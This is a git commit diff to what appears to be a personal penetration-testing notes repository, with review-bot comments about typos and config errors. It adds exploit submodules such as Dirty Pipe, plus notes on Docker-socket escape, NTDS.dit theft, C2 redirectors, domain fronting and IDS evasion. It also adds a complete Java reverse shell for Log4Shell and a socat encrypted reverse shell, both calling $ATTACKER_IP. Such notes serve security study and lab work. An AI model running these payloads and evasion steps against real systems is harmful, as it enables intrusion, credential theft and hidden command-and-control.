bump
parent
32fa6a672b
commit
a3a6f09472
|
@ -139,3 +139,24 @@
|
||||||
[submodule "exploit/windows/printspoofer"]
|
[submodule "exploit/windows/printspoofer"]
|
||||||
path = exploit/windows/printspoofer
|
path = exploit/windows/printspoofer
|
||||||
url = https://github.com/dievus/printspoofer.git
|
url = https://github.com/dievus/printspoofer.git
|
||||||
|
[submodule "post_exploitation/powershell"]
|
||||||
|
path = post_exploitation/powershell
|
||||||
|
url = https://github.com/puckiestyle/powershell.git
|
||||||
|
[submodule "enumeration/network_scanners/kotlin-port-scanner"]
|
||||||
|
path = enumeration/network_scanners/kotlin-port-scanner
|
||||||
|
url = https://github.com/Hydragyrum/kotlin-port-scanner.git
|
||||||
|
[submodule "exploit/macOS/ds_store_exp"]
|
||||||
|
path = exploit/macOS/ds_store_exp
|
||||||
|
url = https://github.com/lijiejie/ds_store_exp.git
|
||||||
|
[submodule "exploit/macOS/DS_Store_crawler_parser"]
|
||||||
|
path = exploit/macOS/DS_Store_crawler_parser
|
||||||
|
url = https://github.com/anantshri/DS_Store_crawler_parser.git
|
||||||
|
[submodule "exploit/macOS/Python-dsstore"]
|
||||||
|
path = exploit/macOS/Python-dsstore
|
||||||
|
url = https://github.com/gehaxelt/Python-dsstore.git
|
||||||
|
[submodule "post_exploitation/armitage"]
|
||||||
|
path = post_exploitation/armitage
|
||||||
|
url = https://gitlab.com/kalilinux/packages/armitage.git
|
||||||
|
[submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
|
||||||
|
path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
|
||||||
|
url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git
|
||||||
|
|
|
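Review bot: The submodules added after the printspoofer entry pull exploit and post-exploitation code from personal forks (`dievus/printspoofer`, `puckiestyle/powershell`, `cspshivam/CVE-2022-0847-dirty-pipe-exploit`) rather than from the projects' upstream repositories, and none of the new entries sets a `branch`. The gitlink pins a commit, so a plain `git submodule update` stays reproducible, but `git submodule update --remote` would follow each fork's default branch and silently pull unreviewed changes. Suggest a comment per entry recording provenance, e.g. `# fork of <upstream-repo-placeholder>; reviewed at the pinned commit`, so the review status survives a later bump. The remaining entries of the file are outside this hunk.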
@ -0,0 +1,15 @@
|
||||||
|
# LDAP
|
||||||
|
|
||||||
|
## Get Domain
|
||||||
|
|
||||||
|
```sh
|
||||||
|
ldapsearch -x -h $TARGET_IP -s base namingcontexts
|
||||||
|
```
|
||||||
|
|
||||||
|
## Domain Dump
|
||||||
|
|
||||||
|
* If a set of credentials are known via
|
||||||
|
```sh
|
||||||
|
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
|
||||||
|
```
|
||||||
|
* Take a look at the genreated HTML files
|
|
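Review bot: `* If a set of credentials are known via` in the Domain Dump section is an unfinished sentence that trails into the code fence; suggest `* If a set of credentials is known, dump the domain via`. `genreated` in the last bullet should be `generated`. The `## Get Domain` heading describes reading the naming contexts, so `## Get Naming Contexts / Domain` would match the command below it more closely.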
@ -0,0 +1 @@
|
||||||
|
Subproject commit 54bfab4c7cd09f9a6d50280af00f1984d5430a1e
|
|
@ -1,6 +1,11 @@
|
||||||
# Evil-winrm
|
# Evil-winrm
|
||||||
|
|
||||||
|
|
||||||
* Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
|
* Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
|
||||||
```sh
|
```sh
|
||||||
download C:\Windows\Temp\<file>
|
download C:\Windows\Temp\<file>
|
||||||
```
|
```
|
||||||
|
* The other way
|
||||||
|
```
|
||||||
|
upload yadayda
|
||||||
|
```
|
||||||
|
|
|
@ -37,7 +37,7 @@ X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
|
||||||
* A Proxy LDAP server to an HTTP server is needed
|
* A Proxy LDAP server to an HTTP server is needed
|
||||||
|
|
||||||
* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
|
* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
|
||||||
```sh
|
```java
|
||||||
public class Exploit {
|
public class Exploit {
|
||||||
static {
|
static {
|
||||||
try {
|
try {
|
||||||
|
@ -48,12 +48,52 @@ public class Exploit {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
or another one
|
||||||
|
```java
|
||||||
|
import java.io.InputStream;
|
||||||
|
import java.io.OutputStream;
|
||||||
|
import java.net.Socket;
|
||||||
|
|
||||||
|
public class Exploit {
|
||||||
|
static {
|
||||||
|
String host = "$ATTACKER_IP";
|
||||||
|
int port = 4711;
|
||||||
|
String cmd = "/bin/sh";
|
||||||
|
try {
|
||||||
|
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
|
||||||
|
Socket s = new Socket(host, port);
|
||||||
|
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
|
||||||
|
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
|
||||||
|
while (!s.isClosed()) {
|
||||||
|
while (pi.available() > 0)
|
||||||
|
so.write(pi.read());
|
||||||
|
while (pe.available() > 0)
|
||||||
|
so.write(pe.read());
|
||||||
|
while (si.available() > 0)
|
||||||
|
po.write(si.read());
|
||||||
|
so.flush();
|
||||||
|
po.flush();
|
||||||
|
Thread.sleep(50);
|
||||||
|
try {
|
||||||
|
p.exitValue();
|
||||||
|
break;
|
||||||
|
} catch (Exception e) {
|
||||||
|
}
|
||||||
|
}
|
||||||
|
p.destroy();
|
||||||
|
s.close();
|
||||||
|
} catch (Exception e) {
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
* Run the LDAP, HTTP and reverse shell
|
* Run the LDAP, HTTP and reverse shell
|
||||||
```sh
|
```sh
|
||||||
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
|
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
|
||||||
```
|
```
|
||||||
```sh
|
```sh
|
||||||
php -S 0.0.0.:8000
|
php -S 0.0.0.0:8000
|
||||||
```
|
```
|
||||||
```sh
|
```sh
|
||||||
nc -lvnp 4449
|
nc -lvnp 4449
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit e1fd1f65caa686bbb1510ae07efbdc3a0e4b8330
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 9e003a3196570a8e882e55cf9824fd3bf98886be
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 859781b834244774cb509e96ccc29ee646f72739
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 784eada6cd08739032b7fdc124a8c93abcb0c2f7
|
|
@ -0,0 +1,14 @@
|
||||||
|
# .lnk exploit
|
||||||
|
|
||||||
|
* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)
|
||||||
|
* [mamachine's tool](http://mamachine.org/mslink/index.en.html)
|
||||||
|
|
||||||
|
* Target does not even have to open the link directly
|
||||||
|
|
||||||
|
```sh
|
||||||
|
mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk
|
||||||
|
```
|
||||||
|
* Start a responder and wait for user's hash
|
||||||
|
```sh
|
||||||
|
responder -I eth0
|
||||||
|
```
|
|
@ -0,0 +1,57 @@
|
||||||
|
# Hadoop
|
||||||
|
|
||||||
|
Distributed storage and computing
|
||||||
|
* [Hadoop Attack Libs](https://github.com/wavestone-cdt/hadoop-attack-library.git)
|
||||||
|
|
||||||
|
## Terminology
|
||||||
|
* __Cluster__, forms the datalake
|
||||||
|
* __Node__, single host inside the cluster
|
||||||
|
* __NameNode__, node that keeps the dir tree of the Hadoop file system
|
||||||
|
* __DataNode__, slave node that stores files and is instructed by the NameNode
|
||||||
|
* __Primary NameNode__, current active node responsible for keeping the directory structure
|
||||||
|
* __Secondary NameNode__, hot standby for Primary NameNode. There may be multiple on standby inside the cluster
|
||||||
|
* __Master Node__, Hadoop management app like HDFS or YARN Manager
|
||||||
|
* __Slave Node__, Hadoop worker like HDFS or MapReduce. a node can be master and slave at the same time
|
||||||
|
* __Edge Node__, hosting Hadoop user app like Zeppelin or Hue
|
||||||
|
* __Kerberised__, security enabled cluster through Kerberos
|
||||||
|
|
||||||
|
* __HDFS__, Hadoop Distributed File System, storage device for unstructured data
|
||||||
|
* __Hive__, primary DB for structured data
|
||||||
|
* __YARN__, scheduling jobs and resource management
|
||||||
|
* __MapReduce__, distributed filtering, sorting and reducing
|
||||||
|
* __HUE__, GUI for HDFS and Hive
|
||||||
|
* __Zookeeper__, cluster management
|
||||||
|
* __Kafka__, message broker
|
||||||
|
* __Ranger__, privileged ACL
|
||||||
|
* __Zeppelin__, data analytivs inside a webUI
|
||||||
|
|
||||||
|
## Zeppelin
|
||||||
|
|
||||||
|
* Try [default logins](https://zeppelin.apache.org/docs/0.8.2/setup/security/shiro_authentication.html#4-login)
|
||||||
|
* Try execution inside notebooks
|
||||||
|
|
||||||
|
## Ktabs
|
||||||
|
|
||||||
|
* Finding `ktpass`es to authenticate at the kerberos TGS
|
||||||
|
* Output principals and use them to init
|
||||||
|
```sh
|
||||||
|
klist -k <keytabfile>
|
||||||
|
kinit <prinicpal name> -k -V -t <keytabfile>
|
||||||
|
```
|
||||||
|
|
||||||
|
## HDFS
|
||||||
|
|
||||||
|
* User the `hdfs` utility to enumerate the distributed network storage
|
||||||
|
```sh
|
||||||
|
hdfs dfs -ls /
|
||||||
|
```
|
||||||
|
* Current user and user on the storage do not have to correspond
|
||||||
|
* Touched files on the storage may be owned by root
|
||||||
|
```sh
|
||||||
|
hdfs dfs -touchz testfile /tmp/testfile
|
||||||
|
hdfs dfs -ls /tmp
|
||||||
|
```
|
||||||
|
* Impersonate by sourcing keytab file of the user, __NodeManager__ is the highest user in regards to permission
|
||||||
|
|
||||||
|
|
||||||
|
|
|
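Review bot: Several terms in the new Hadoop page are misspelled in ways that change meaning: the `## Ktabs` heading and `ktpass`es refer to keytab files (`ktpass` is a different, Windows-side tool), `prinicpal` in the `kinit` example, `analytivs` in the Zeppelin bullet, and `User the hdfs utility`. Suggest `## Keytabs`, `* Finding keytab files to authenticate at the Kerberos TGS`, `kinit <principal name> -k -V -t <keytabfile>`, and `* Use the hdfs utility`. `__Ranger__, privileged ACL` is unclear; `__Ranger__, centralized access control / ACLs` reads better if that is what is meant.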
@ -125,7 +125,20 @@ curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.s
|
||||||
```sh
|
```sh
|
||||||
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
|
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
|
||||||
```
|
```
|
||||||
* Login in to the host via ssh
|
* Login in to the host via ssh remotely or socat locally
|
||||||
|
```sh
|
||||||
|
socat - UNIX-CONNECT:/var/run/docker.sock
|
||||||
|
POST /containers/<CONTAINERID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Connection: Upgrade
|
||||||
|
Upgrade: tcp
|
||||||
|
|
||||||
|
HTTP/1.1 101 UPGRADED
|
||||||
|
Content-Type: application/vnd.docker.raw-stream
|
||||||
|
Connection: Upgrade
|
||||||
|
Upgrade: tcp
|
||||||
|
```
|
||||||
|
|
||||||
## Escape through DB
|
## Escape through DB
|
||||||
|
|
||||||
* Login into DB
|
* Login into DB
|
||||||
|
|
|
@ -60,6 +60,10 @@ cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<J
|
||||||
```sh
|
```sh
|
||||||
puttygen <keyfile> -o key.ppk
|
puttygen <keyfile> -o key.ppk
|
||||||
```
|
```
|
||||||
|
* Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d)
|
||||||
|
```sh
|
||||||
|
echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>
|
||||||
|
```
|
||||||
|
|
||||||
### Socat
|
### Socat
|
||||||
* Reverse shell on target via
|
* Reverse shell on target via
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit d07b0227e9ba0dc6de0c688a44ed17803c5216c6
|
|
@ -2,3 +2,44 @@
|
||||||
|
|
||||||
* [Matrix](https://www.thec2matrix.com/)
|
* [Matrix](https://www.thec2matrix.com/)
|
||||||
* [bcsecurity](https://www.bc-security.org/) maintains Empire 4
|
* [bcsecurity](https://www.bc-security.org/) maintains Empire 4
|
||||||
|
* [Empire](https://github.com/BC-SECURITY/Empire.git)
|
||||||
|
* [Armitage](https://gitlab.com/kalilinux/packages/armitage.git)
|
||||||
|
* [Covenant](https://github.com/cobbr/Covenant)
|
||||||
|
* [Sliver](https://github.com/BishopFox/sliver)
|
||||||
|
|
||||||
|
* Server
|
||||||
|
* Listener
|
||||||
|
* Payloads/Agents
|
||||||
|
* Staged/Dropper
|
||||||
|
* Stageless
|
||||||
|
* Beacons from Agents, disguised through jitter
|
||||||
|
* Modules
|
||||||
|
* Post Exploitation
|
||||||
|
* Pivoting
|
||||||
|
|
||||||
|
## Domain Fronting
|
||||||
|
|
||||||
|
* Use a Domain on the C2 server
|
||||||
|
* User Cloudflare to proxy the request and responses to and from the target
|
||||||
|
* Use HTTPs for channel encryption
|
||||||
|
|
||||||
|
## Profiles
|
||||||
|
|
||||||
|
* Server evaluates by custom user-agents to identify agents
|
||||||
|
|
||||||
|
## Types
|
||||||
|
|
||||||
|
* Std listener, TCP or UDP
|
||||||
|
* HTTP/HTTPS, counter FW
|
||||||
|
* DNS, if internet access of the target is flaky
|
||||||
|
* SMB, counter network segments
|
||||||
|
|
||||||
|
## Redirector
|
||||||
|
|
||||||
|
* Apache or nginx as reverse proxy in front of the c2 server
|
||||||
|
* FW is still needed in front of the redirector
|
||||||
|
* These get burned instead of the c2
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
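Review bot: `* User Cloudflare to proxy the request and responses` under Domain Fronting should read `* Use Cloudflare to proxy the requests and responses`, and `HTTPs` should be `HTTPS`. The `## Types` heading does not say what is being typed; `## Listener Types` matches the bullets beneath it. `FW` in the Redirector section is used without expansion; spelling out `firewall` once would help readers unfamiliar with the abbreviation.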
@ -0,0 +1,79 @@
|
||||||
|
# IDS & IPS Evation
|
||||||
|
|
||||||
|
* Evation by manipulation of
|
||||||
|
* Protocol
|
||||||
|
* Payload
|
||||||
|
* Route
|
||||||
|
* Or DoS
|
||||||
|
|
||||||
|
## Protocol Manipulation
|
||||||
|
|
||||||
|
### Relying on another protocol
|
||||||
|
* `nc -ulvnp 4711` for listening to incoming UDP traffic
|
||||||
|
* `nc -u $TARGET_IP $TARGET_PORT` for connecting through UDP
|
||||||
|
|
||||||
|
### Manipulation of the source's or LHOST's network port
|
||||||
|
* `nmap -g 80` or `nmap --source-port 53` to send outgoing nmap traffic through it
|
||||||
|
|
||||||
|
### Session splicing by fragmentation and segmentation
|
||||||
|
* `nmap` fragmentation in 8 bytes `-f`, 16 bytes `-ff`, `--mtu <size>` for MTU
|
||||||
|
* Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag <num>` in `fragroute.conf`, then use `fragroute -f fragroute.conf $TARGET_IP`
|
||||||
|
|
||||||
|
### Sending invalid packets
|
||||||
|
* Invalid protocol header flags and checksums via`nmap --badsum`, `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. concatentation of multiple flags `nmap --scanflags SYNRSTFIN`
|
||||||
|
* `hping3` including `--ttl`, `--badsum`, header flags `-S`,`-A`,`-P`,`-U`,`-F`,`-R`
|
||||||
|
|
||||||
|
## Payload Manipulation
|
||||||
|
|
||||||
|
### Obfuscation and Encoding
|
||||||
|
* Base64
|
||||||
|
* URL
|
||||||
|
* Escaped Unicode Characters
|
||||||
|
|
||||||
|
### Encrypting Communication Channels
|
||||||
|
* Use socat with encryption
|
||||||
|
```sh
|
||||||
|
openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
|
||||||
|
```
|
||||||
|
* Create `.pem` (Privacy Enhanced Mail) file via
|
||||||
|
```
|
||||||
|
cat id_rsa.key reverse.crt > reverse.pem
|
||||||
|
```
|
||||||
|
* Listening on attacker side
|
||||||
|
```sh
|
||||||
|
socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
|
||||||
|
```
|
||||||
|
* On target
|
||||||
|
```sh
|
||||||
|
socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash
|
||||||
|
```
|
||||||
|
|
||||||
|
### Modification of Data
|
||||||
|
* Order of parameters, instead of `nc -lvnp` it is `nc -vpnl`
|
||||||
|
* Adding whitespaces to the commands
|
||||||
|
* Use aliases
|
||||||
|
|
||||||
|
## Route Manipulation
|
||||||
|
|
||||||
|
### Relying on Source Routing
|
||||||
|
* `nmap --ip-options "L 10.10.20.30 10.10.30.40` routes through these IPs loosely
|
||||||
|
* `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through the IPs strictly
|
||||||
|
|
||||||
|
### Using Proxyy Servers
|
||||||
|
* `nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP`
|
||||||
|
|
||||||
|
## Tactical DoS
|
||||||
|
* Non malicious, benign traffic against
|
||||||
|
* IDS/IPS
|
||||||
|
* Logging server
|
||||||
|
|
||||||
|
## MISC
|
||||||
|
|
||||||
|
* Changing
|
||||||
|
* `User-Agent`
|
||||||
|
* Request frequency and duration of sleep
|
||||||
|
* SSL/TLS certs
|
||||||
|
* DNS beacon, storing exfiltrated data in the query
|
||||||
|
|
||||||
|
|
||||||
|
|
|
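Review bot: The loose source-routing example `nmap --ip-options "L 10.10.20.30 10.10.30.40` has an unbalanced double quote; it should read `nmap --ip-options "L 10.10.20.30 10.10.30.40"` like the strict example on the next line. `-days 356` in the openssl command looks like a transposed `365`. The title `# IDS & IPS Evation` and the bullet `Evation by manipulation of` should be `Evasion`, `Proxyy Servers` should be `Proxy Servers`, and `concatentation` should be `concatenation`. The fence before `cat id_rsa.key reverse.crt > reverse.pem` is untagged while every other fence on the page uses ` ```sh `.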
@ -58,3 +58,33 @@ set PAYLOAD windows/meterpreter/reverse_http
|
||||||
run -j
|
run -j
|
||||||
```
|
```
|
||||||
* Copy into powershell/cmd
|
* Copy into powershell/cmd
|
||||||
|
|
||||||
|
|
||||||
|
## Reverse Proxy
|
||||||
|
|
||||||
|
* Hide behind reverse proxy, e.g. apache
|
||||||
|
* In case of an apache, these modules must be enabled
|
||||||
|
* rewrite
|
||||||
|
* proxy
|
||||||
|
* proxy_http
|
||||||
|
* headers
|
||||||
|
* Use `User-Agent` to identify targets
|
||||||
|
```ucl
|
||||||
|
<VirtualHost *:80>
|
||||||
|
|
||||||
|
ServerAdmin webmaster@localhost
|
||||||
|
DocumentRoot /var/www/html
|
||||||
|
|
||||||
|
RewriteEngine On
|
||||||
|
RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
|
||||||
|
ProxyPass "/" "http://localhost:8080/"
|
||||||
|
|
||||||
|
<Directory>
|
||||||
|
AllowOverride All
|
||||||
|
</Directory>
|
||||||
|
|
||||||
|
ErrorLog ${APACHE_LOG_DIR}/error.log
|
||||||
|
CustomLog ${APACHE_LOG_DIR}/access.log combined
|
||||||
|
|
||||||
|
</VirtualHost>
|
||||||
|
```
|
||||||
|
|
|
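Review bot: `<Directory>` in the Apache snippet has no path argument, which httpd rejects at `apachectl configtest`; it should be `<Directory /var/www/html>` or the block dropped. The fence is tagged ` ```ucl `, but the content is Apache httpd configuration, so `apache` (or `apacheconf`) is the usual tag and highlights correctly. Worth a one-line caveat in the note as well: `RewriteCond` only applies to the `RewriteRule` that immediately follows it, and none follows here, so readers should not assume the `User-Agent` condition gates the `ProxyPass` line as written.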
@ -6,21 +6,21 @@
|
||||||
* Check `whoami /all`
|
* Check `whoami /all`
|
||||||
* `SeBackupPrivilege` must be present
|
* `SeBackupPrivilege` must be present
|
||||||
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
|
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
|
||||||
* Upload `diskshadow.txt` to the target with the following content
|
* Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!!
|
||||||
```sh
|
```sh
|
||||||
set metadata C:\tmp\tmp.cabs
|
set metadata C:\tmp\tmp.cabs
|
||||||
set context persistent nowriters
|
set context persistent nowriters
|
||||||
add volume c: alias someAlias
|
add volume c: alias someAlias
|
||||||
create
|
create
|
||||||
expose %someAlias% h:
|
expose %someAlias% h:
|
||||||
```
|
```
|
||||||
* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\Path\to\diskshadow.txt`
|
* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt`
|
||||||
* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
|
* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
|
||||||
```sh
|
```sh
|
||||||
import-module .\SeBackupPrivilegeUtils.dll
|
import-module .\SeBackupPrivilegeUtils.dll
|
||||||
import-module .\SeBackupPrivilegeCmdLets.dll
|
import-module .\SeBackupPrivilegeCmdLets.dll
|
||||||
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
|
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
|
||||||
reg save HKLM\SYSTEM C:\Path\to\uploads\system
|
reg save HKLM\SYSTEM C:\tmp\system
|
||||||
```
|
```
|
||||||
* Downloads the files `ntds.dit` and `system`
|
* Downloads the files `ntds.dit` and `system`
|
||||||
* Extract the hashes via
|
* Extract the hashes via
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 81e5fba23f24fb74eaabeeb8665c9f9dff4c535b
|